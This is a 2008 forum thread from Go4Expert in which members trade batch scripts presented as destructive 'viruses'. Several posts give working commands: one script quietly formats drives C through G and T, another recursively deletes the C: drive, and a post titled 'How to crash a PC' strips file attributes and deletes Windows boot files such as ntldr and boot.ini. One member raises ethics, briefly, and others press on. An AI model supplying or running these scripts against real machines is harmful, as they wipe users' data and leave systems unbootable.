Ambitious contributor
16Jul2008,19:30   #21
GreenGrass's Avatar
hehe
Go4Expert Founder
16Jul2008,19:52   #22
shabbir's Avatar
Aren't we forgetting the Ethical part.
Pro contributor
16Jul2008,22:06   #23
hanleyhansen's Avatar
Check out XXxxImmortalxxXX article on batch programming to learn how to make good fundamental batch viruses. The viruses described are very powerful.

http://www.go4expert.com/showthread.php?t=11845
Contributor
17Jul2008,06:56   #24
microapple's Avatar
Quote:
Originally Posted by shabbir
Aren't we forgetting the Ethical part.
Sorry, but seriously would would want to completely destroy someones computer? Not me!
Team Leader
17Jul2008,12:52   #25
jwshepherd's Avatar
Quote:
Originally Posted by microapple
If you want a completely destucive virus use this:

Code:
@echo off
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
format t: /q /y
This will completely wipe anything attached to their computer or saved on their computer. I have not tested this out for obvious reasons, but why destroy their computer? Why not just make something that ticks them off so much that they destroy their computer? Jus kiddin
Xp locks most disks it has access to from INT 13 commands which you would need to be able to run the format command. a simpler way is to use rd:

Code:
rd c: /q /s
I currently use it to clean temp directories instead of sending things to the recycle bin

Code:
cd %TEMP%
rd . /s/q
cd ../"temporary internet files"
rd . /s/q
fast clean efficient


Viruses whether destructive or not are a part of our world. Learning to use them is to our advantage.
Invasive contributor
19Jul2008,17:39   #26
neo_vi's Avatar
I dont know wat dabullet is trying to tell. all he tells is to delete all the files.

It can easily done by the command format.

any one pls explain. whats his idea???
Contributor
19Jul2008,19:17   #27
microapple's Avatar
Quote:
Originally Posted by neo_vi
I dont know wat dabullet is trying to tell. all he tells is to delete all the files.

It can easily done by the command format.

any one pls explain. whats his idea???
idk
Skilled contributor
19Jul2008,23:59   #28
faizulhaque's Avatar
@topic Creator

just making few steps to a virus program.

I have also a few batch code for making such type of virus,

How to crash a PC
Code:
@echo off 
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
i don't know who the prgram of topic creator is work it's b/c without changing attribute of boot file or dll or ini file who could i delete or erase it.
would any one explain me